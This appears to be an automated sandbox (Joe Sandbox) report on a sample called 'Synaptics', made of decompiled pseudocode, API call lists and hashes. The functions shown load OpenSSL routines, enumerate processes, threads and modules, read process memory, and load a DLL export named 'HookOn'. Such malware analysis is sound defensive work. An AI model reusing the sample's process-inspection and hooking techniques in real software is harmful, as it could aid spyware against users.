                                                                                                                                                                                                                            					 *0x49d574 = E0049058C("SSL_get_current_cipher", _t158);
                                                                                                                                                                                                                            					 *0x49d578 = E0049058C("SSL_CIPHER_get_name", _t158);
                                                                                                                                                                                                                            					 *0x49d57c = E0049058C("SSL_CIPHER_get_version", _t158);
                                                                                                                                                                                                                            					 *0x49d580 = E0049058C("SSL_CIPHER_get_bits", _t158);
                                                                                                                                                                                                                            					if( *0x49d454 == 0 ||  *0x49d458 == 0 ||  *0x49d45c == 0 ||  *0x49d460 == 0 ||  *0x49d464 == 0 ||  *0x49d468 == 0 ||  *0x49d46c == 0 ||  *0x49d470 == 0 ||  *0x49d474 == 0 ||  *0x49d478 == 0 ||  *0x49d484 == 0 ||  *0x49d488 == 0 ||  *0x49d48c == 0 ||  *0x49d490 == 0 ||  *0x49d494 == 0 ||  *0x49d498 == 0 ||  *0x49d49c == 0 ||  *0x49d4a0 == 0 ||  *0x49d4a4 == 0 ||  *0x49d4a8 == 0 ||  *0x49d4ac == 0 ||  *0x49d4b0 == 0 ||  *0x49d4b4 == 0 ||  *0x49d4b8 == 0 ||  *0x49d4bc == 0 ||  *0x49d4c0 == 0 ||  *0x49d4c4 == 0 ||  *0x49d4c8 == 0 ||  *0x49d4cc == 0 ||  *0x49d4d0 == 0 ||  *0x49d4d4 == 0 ||  *0x49d4d8 == 0 ||  *0x49d4dc == 0 ||  *0x49d4e0 == 0 ||  *0x49d4e4 == 0 ||  *0x49d4e8 == 0 ||  *0x49d4ec == 0 ||  *0x49d4f0 == 0 ||  *0x49d4f4 == 0 ||  *0x49d4f8 == 0 ||  *0x49d4fc == 0 ||  *0x49d500 == 0 ||  *0x49d504 == 0 ||  *0x49d508 == 0 ||  *0x49d50c == 0 ||  *0x49d510 == 0 ||  *0x49d514 == 0 ||  *0x49d51c == 0 ||  *0x49d520 == 0 ||  *0x49d524 == 0 ||  *0x49d528 == 0 ||  *0x49d534 == 0 ||  *0x49d538 == 0 ||  *0x49d53c == 0 ||  *0x49d540 == 0 ||  *0x49d544 == 0 ||  *0x49d548 == 0 ||  *0x49d54c == 0 ||  *0x49d550 == 0 ||  *0x49d554 == 0 ||  *0x49d558 == 0 ||  *0x49d55c == 0 ||  *0x49d47c == 0 ||  *0x49d480 == 0 ||  *0x49d560 == 0 ||  *0x49d564 == 0 ||  *0x49d568 == 0 ||  *0x49d56c == 0 ||  *0x49d570 == 0 ||  *0x49d574 == 0 ||  *0x49d578 == 0 ||  *0x49d580 == 0 ||  *0x49d57c == 0) {
                                                                                                                                                                                                                            						_t158 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t158 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t158;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            0x004908f7
                                                                                                                                                                                                                            0x00490906
                                                                                                                                                                                                                            0x00490915
                                                                                                                                                                                                                            0x00490924
                                                                                                                                                                                                                            0x00490933
                                                                                                                                                                                                                            0x00490942
                                                                                                                                                                                                                            0x00490951
                                                                                                                                                                                                                            0x00490960
                                                                                                                                                                                                                            0x0049096f
                                                                                                                                                                                                                            0x0049097e
                                                                                                                                                                                                                            0x0049098d
                                                                                                                                                                                                                            0x0049099c
                                                                                                                                                                                                                            0x004909ab
                                                                                                                                                                                                                            0x004909ba
                                                                                                                                                                                                                            0x004909c9
                                                                                                                                                                                                                            0x004909d8
                                                                                                                                                                                                                            0x004909e7
                                                                                                                                                                                                                            0x004909f6
                                                                                                                                                                                                                            0x00490a05
                                                                                                                                                                                                                            0x00490a14
                                                                                                                                                                                                                            0x00490a23
                                                                                                                                                                                                                            0x00490a32
                                                                                                                                                                                                                            0x00490a41
                                                                                                                                                                                                                            0x00490a50
                                                                                                                                                                                                                            0x00490a5f
                                                                                                                                                                                                                            0x00490a6e
                                                                                                                                                                                                                            0x00490a7d
                                                                                                                                                                                                                            0x00490a8c
                                                                                                                                                                                                                            0x00490a9b
                                                                                                                                                                                                                            0x00490aaa
                                                                                                                                                                                                                            0x00490ab9
                                                                                                                                                                                                                            0x00490ac8
                                                                                                                                                                                                                            0x00490ad7
                                                                                                                                                                                                                            0x00490ae6
                                                                                                                                                                                                                            0x00490af5
                                                                                                                                                                                                                            0x00490b04
                                                                                                                                                                                                                            0x00490b13
                                                                                                                                                                                                                            0x00490b22
                                                                                                                                                                                                                            0x00490b31
                                                                                                                                                                                                                            0x00490b40
                                                                                                                                                                                                                            0x00490b4f
                                                                                                                                                                                                                            0x00490b5e
                                                                                                                                                                                                                            0x00490b6d
                                                                                                                                                                                                                            0x00490b79
                                                                                                                                                                                                                            0x00490eeb
                                                                                                                                                                                                                            0x00490eef
                                                                                                                                                                                                                            0x00490eef
                                                                                                                                                                                                                            0x00490eef
                                                                                                                                                                                                                            0x00490b79
                                                                                                                                                                                                                            0x00490ef4

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(libeay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906C9
                                                                                                                                                                                                                              • Part of subcall function 0049058C: GetProcAddress.KERNEL32(00000000,00000000), ref: 004905C6
                                                                                                                                                                                                                              • Part of subcall function 00490648: GetProcAddress.KERNEL32(00000000,00000000), ref: 00490682
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ssleay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906E5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                            • String ID: EVP_md5$RAND_screen$SSL_CIPHER_description$SSL_CIPHER_get_bits$SSL_CIPHER_get_name$SSL_CIPHER_get_version$SSL_CTX_check_private_key$SSL_CTX_free$SSL_CTX_get_verify_depth$SSL_CTX_get_version_indy$SSL_CTX_load_verify_locations$SSL_CTX_new$SSL_CTX_set_cipher_list$SSL_CTX_set_client_CA_list$SSL_CTX_set_default_passwd_cb$SSL_CTX_set_default_passwd_cb_userdata$SSL_CTX_set_default_verify_paths$SSL_CTX_set_info_callback_indy$SSL_CTX_set_options_indy$SSL_CTX_set_session_id_context$SSL_CTX_set_verify$SSL_CTX_set_verify_depth$SSL_CTX_use_PrivateKey_file$SSL_CTX_use_certificate_file$SSL_SESSION_get_id_ctx_indy$SSL_SESSION_get_id_indy$SSL_accept$SSL_connect$SSL_free$SSL_get_current_cipher$SSL_get_error$SSL_get_ex_data$SSL_get_peer_certificate$SSL_get_session$SSL_library_init$SSL_load_client_CA_file$SSL_load_error_strings$SSL_new$SSL_peek$SSL_read$SSL_set_accept_state$SSL_set_connect_state$SSL_set_ex_data$SSL_set_fd$SSL_set_shutdown$SSL_shutdown$SSL_state_string_long$SSL_write$SSLv23_client_method$SSLv23_method$SSLv23_server_method$SSLv2_client_method$SSLv2_method$SSLv2_server_method$SSLv3_client_method$SSLv3_method$SSLv3_server_method$TLSv1_client_method$TLSv1_method$TLSv1_server_method$X509_NAME_hash$X509_NAME_oneline$X509_STORE_CTX_get_app_data_indy$X509_STORE_CTX_get_current_cert$X509_STORE_CTX_get_error$X509_STORE_CTX_get_error_depth$X509_STORE_CTX_set_error$X509_digest$X509_get_issuer_name$X509_get_notAfter_indy$X509_get_notBefore_indy$X509_get_subject_name$X509_set_issuer_name$X509_set_subject_name$des_ecb_encrypt$des_set_key$des_set_odd_parity$libeay32.dll$ssleay32.dll
                                                                                                                                                                                                                            • API String ID: 2574300362-3914122982
                                                                                                                                                                                                                            • Opcode ID: 31a3a092b2a30d0d7f1c1506beb22041e5308534041b8679323eb52cb0d8e883
                                                                                                                                                                                                                            • Instruction ID: 3fc9e01923c26730d663d19a2b901ff2da1ed37202cb3e817e08d019f5698bc5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31a3a092b2a30d0d7f1c1506beb22041e5308534041b8679323eb52cb0d8e883
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9202C874D00205AEDF75EB6DA90935A3EA1E76432DF06443BA908C72B1D77C9884CF9E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004728A4() {
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x49ebf4 == 0) {
                                                                                                                                                                                                                            					 *0x49ebf4 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                                                            					if( *0x49ebf4 != 0) {
                                                                                                                                                                                                                            						 *0x49ebf8 = GetProcAddress( *0x49ebf4, "CreateToolhelp32Snapshot");
                                                                                                                                                                                                                            						 *0x49ebfc = GetProcAddress( *0x49ebf4, "Heap32ListFirst");
                                                                                                                                                                                                                            						 *0x49ec00 = GetProcAddress( *0x49ebf4, "Heap32ListNext");
                                                                                                                                                                                                                            						 *0x49ec04 = GetProcAddress( *0x49ebf4, "Heap32First");
                                                                                                                                                                                                                            						 *0x49ec08 = GetProcAddress( *0x49ebf4, "Heap32Next");
                                                                                                                                                                                                                            						 *0x49ec0c = GetProcAddress( *0x49ebf4, "Toolhelp32ReadProcessMemory");
                                                                                                                                                                                                                            						 *0x49ec10 = GetProcAddress( *0x49ebf4, "Process32First");
                                                                                                                                                                                                                            						 *0x49ec14 = GetProcAddress( *0x49ebf4, "Process32Next");
                                                                                                                                                                                                                            						 *0x49ec18 = GetProcAddress( *0x49ebf4, "Process32FirstW");
                                                                                                                                                                                                                            						 *0x49ec1c = GetProcAddress( *0x49ebf4, "Process32NextW");
                                                                                                                                                                                                                            						 *0x49ec20 = GetProcAddress( *0x49ebf4, "Thread32First");
                                                                                                                                                                                                                            						 *0x49ec24 = GetProcAddress( *0x49ebf4, "Thread32Next");
                                                                                                                                                                                                                            						 *0x49ec28 = GetProcAddress( *0x49ebf4, "Module32First");
                                                                                                                                                                                                                            						 *0x49ec2c = GetProcAddress( *0x49ebf4, "Module32Next");
                                                                                                                                                                                                                            						 *0x49ec30 = GetProcAddress( *0x49ebf4, "Module32FirstW");
                                                                                                                                                                                                                            						 *0x49ec34 = GetProcAddress( *0x49ebf4, "Module32NextW");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *0x49ebf4 == 0 ||  *0x49ebf8 == 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                            0x004729e3
                                                                                                                                                                                                                            0x004729e3
                                                                                                                                                                                                                            0x004728c2
                                                                                                                                                                                                                            0x004729eb
                                                                                                                                                                                                                            0x004729f9
                                                                                                                                                                                                                            0x004729fa
                                                                                                                                                                                                                            0x004729fd
                                                                                                                                                                                                                            0x004729fd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00472B2B,00000000,021E2354,00475AEA,00000000,00475BD5,?,00000000,021E2354,?,0049A4F9,001F0001,00000000,00000000), ref: 004728B8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004728D0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004728E2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004728F4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00472906
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00472918
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0047292A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0047293C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0047294E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00472960
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00472972
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00472984
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00472996
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004729A8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004729BA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004729CC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004729DE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 667068680-597814768
                                                                                                                                                                                                                            • Opcode ID: c24cc2f4e29e7164c5864ba41ede5b50f237ada6fc0e9d221cefe5e484333100
                                                                                                                                                                                                                            • Instruction ID: 313d851134716cbfac540d50d26340a817d4ff9888428074853f25f373159611
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c24cc2f4e29e7164c5864ba41ede5b50f237ada6fc0e9d221cefe5e484333100
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD311FB0A48250AFDB10EFBADD86F5633A4EB153007108A77B404DF296C6BDE8409B5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 52%
                                                                                                                                                                                                                            			E00426204(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				struct HDC__* _v20;
                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				long _v32;
                                                                                                                                                                                                                            				long _v36;
                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                            				intOrPtr* _t78;
                                                                                                                                                                                                                            				intOrPtr _t87;
                                                                                                                                                                                                                            				struct HDC__* _t88;
                                                                                                                                                                                                                            				intOrPtr _t91;
                                                                                                                                                                                                                            				struct HDC__* _t92;
                                                                                                                                                                                                                            				struct HDC__* _t135;
                                                                                                                                                                                                                            				int _t162;
                                                                                                                                                                                                                            				intOrPtr _t169;
                                                                                                                                                                                                                            				intOrPtr _t171;
                                                                                                                                                                                                                            				struct HDC__* _t173;
                                                                                                                                                                                                                            				int _t175;
                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                            				void* _t178;
                                                                                                                                                                                                                            				intOrPtr _t179;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t177 = _t178;
                                                                                                                                                                                                                            				_t179 = _t178 + 0xffffffdc;
                                                                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t173 = __eax;
                                                                                                                                                                                                                            				_t175 = _a16;
                                                                                                                                                                                                                            				_t162 = _a20;
                                                                                                                                                                                                                            				_v13 = 1;
                                                                                                                                                                                                                            				_t78 =  *0x49de34; // 0x49b0ec
                                                                                                                                                                                                                            				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
                                                                                                                                                                                                                            					_v40 = 0;
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_v20 = E00426060(0);
                                                                                                                                                                                                                            					_push(_t177);
                                                                                                                                                                                                                            					_push(0x426484);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t179;
                                                                                                                                                                                                                            					_push(_t175);
                                                                                                                                                                                                                            					_push(_t162);
                                                                                                                                                                                                                            					_push(_a32);
                                                                                                                                                                                                                            					L004072D8();
                                                                                                                                                                                                                            					_v24 = E00426060(_a32);
                                                                                                                                                                                                                            					_v28 = SelectObject(_v20, _v24);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t87 =  *0x49e894; // 0x100805eb
                                                                                                                                                                                                                            					_push(_t87);
                                                                                                                                                                                                                            					_t88 = _a32;
                                                                                                                                                                                                                            					_push(_t88);
                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            					_v40 = _t88;
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_v40);
                                                                                                                                                                                                                            					_push(_a32);
                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            					if(_v40 == 0) {
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_t91 =  *0x49e894; // 0x100805eb
                                                                                                                                                                                                                            						_push(_t91);
                                                                                                                                                                                                                            						_t92 = _v20;
                                                                                                                                                                                                                            						_push(_t92);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            						_v40 = _t92;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_push(_v40);
                                                                                                                                                                                                                            						_t135 = _v20;
                                                                                                                                                                                                                            						_push(_t135);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            						_v40 = _t135;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_v20);
                                                                                                                                                                                                                            					L00407418();
                                                                                                                                                                                                                            					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
                                                                                                                                                                                                                            					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
                                                                                                                                                                                                                            					_v32 = SetTextColor(_t173, 0);
                                                                                                                                                                                                                            					_v36 = SetBkColor(_t173, 0xffffff);
                                                                                                                                                                                                                            					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
                                                                                                                                                                                                                            					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
                                                                                                                                                                                                                            					SetTextColor(_t173, _v32);
                                                                                                                                                                                                                            					SetBkColor(_t173, _v36);
                                                                                                                                                                                                                            					if(_v28 != 0) {
                                                                                                                                                                                                                            						SelectObject(_v20, _v28);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					DeleteObject(_v24);
                                                                                                                                                                                                                            					_pop(_t169);
                                                                                                                                                                                                                            					 *[fs:eax] = _t169;
                                                                                                                                                                                                                            					_push(0x42648b);
                                                                                                                                                                                                                            					if(_v40 != 0) {
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(_v40);
                                                                                                                                                                                                                            						_push(_v20);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return DeleteDC(_v20);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(_a32);
                                                                                                                                                                                                                            					L004072D8();
                                                                                                                                                                                                                            					_v24 = E00426060(_a32);
                                                                                                                                                                                                                            					_v24 = SelectObject(_a12, _v24);
                                                                                                                                                                                                                            					_push(_t177);
                                                                                                                                                                                                                            					_push(0x4262d7);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t179;
                                                                                                                                                                                                                            					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407A44(0xaa0029, 0xcc0020));
                                                                                                                                                                                                                            					_pop(_t171);
                                                                                                                                                                                                                            					 *[fs:eax] = _t171;
                                                                                                                                                                                                                            					_push(0x42648b);
                                                                                                                                                                                                                            					_v24 = SelectObject(_a12, _v24);
                                                                                                                                                                                                                            					return DeleteObject(_v24);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A520.GDI32(?,00000001,00000001), ref: 00426247
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042625C
                                                                                                                                                                                                                            • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,004262D7,?,?), ref: 004262AB
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 004262C5
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004262D1
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 004262E5
                                                                                                                                                                                                                            • 73C9A520.GDI32(?,?,?,00000000,00426484,?,00000000), ref: 00426306
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042631B
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,100805EB,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 0042632F
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,100805EB,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 00426341
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,000000FF,?,?,00000000,?,100805EB,00000000,?,?,?,?,?,00000000,00426484), ref: 00426356
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,100805EB,000000FF,?,?,00000000,?,100805EB,00000000,?,?,?,?,?,00000000,00426484), ref: 0042636C
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,100805EB,000000FF,?,?,00000000,?,100805EB,00000000,?,?,?,?,?,00000000), ref: 00426378
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042639A
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 004263BC
                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004263C4
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004263D2
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004263FE
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426423
                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 0042642D
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00426437
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042644A
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00426453
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,00000000,0042648B,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00426475
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 0042647E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3348367721-0
                                                                                                                                                                                                                            • Opcode ID: 51e273fba67bde6babbdc730237f11150b88246f786cee28d1dbe93902eef5d4
                                                                                                                                                                                                                            • Instruction ID: aac08ee918962813e68096157f6589243fc941b0343c0b747259aa04d8bf8f88
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e273fba67bde6babbdc730237f11150b88246f786cee28d1dbe93902eef5d4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7681A6B1A44218AFDB50EE99CD81FAF7BECAB0D714F510559FA18F7281C238AD008B75
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E004764E4(void* __eax, void* __ebx, void __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t30;
                                                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                            				void _t97;
                                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t97 = __ecx;
                                                                                                                                                                                                                            				_t74 = __edx;
                                                                                                                                                                                                                            				_t99 = __eax;
                                                                                                                                                                                                                            				_push(_t102);
                                                                                                                                                                                                                            				_push(0x476697);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t102;
                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                            					if( *((intOrPtr*)(__eax + 0x48)) != 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(__eax + 0x48))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 =  *(_t99 + 0x40);
                                                                                                                                                                                                                            					if(_t30 != 0) {
                                                                                                                                                                                                                            						FreeLibrary(_t30);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *(_t99 + 0x30) != 0) {
                                                                                                                                                                                                                            						UnmapViewOfFile( *(_t99 + 0x38));
                                                                                                                                                                                                                            						UnmapViewOfFile( *(_t99 + 0x3c));
                                                                                                                                                                                                                            						CloseHandle( *(_t99 + 0x30));
                                                                                                                                                                                                                            						CloseHandle( *(_t99 + 0x34));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t82 =  *0x49ec58; // 0x21e4a3c
                                                                                                                                                                                                                            					E0047671C(__edx, _t82, __edx, __ecx, __eax);
                                                                                                                                                                                                                            					_t46 =  *0x49ec5c; // 0x0
                                                                                                                                                                                                                            					 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t46));
                                                                                                                                                                                                                            					if( *(_t99 + 0x40) == 0) {
                                                                                                                                                                                                                            						_t86 =  *0x49ec58; // 0x21e4a3c
                                                                                                                                                                                                                            						E00404CCC( &_v8, _t86, 0x4766ac);
                                                                                                                                                                                                                            						E0047671C(_t74, _v8, _t74, _t97, _t99);
                                                                                                                                                                                                                            						_t70 =  *0x49ec5c; // 0x0
                                                                                                                                                                                                                            						 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t70));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t99 + 0x44)) = GetProcAddress( *(_t99 + 0x40), "HookOn");
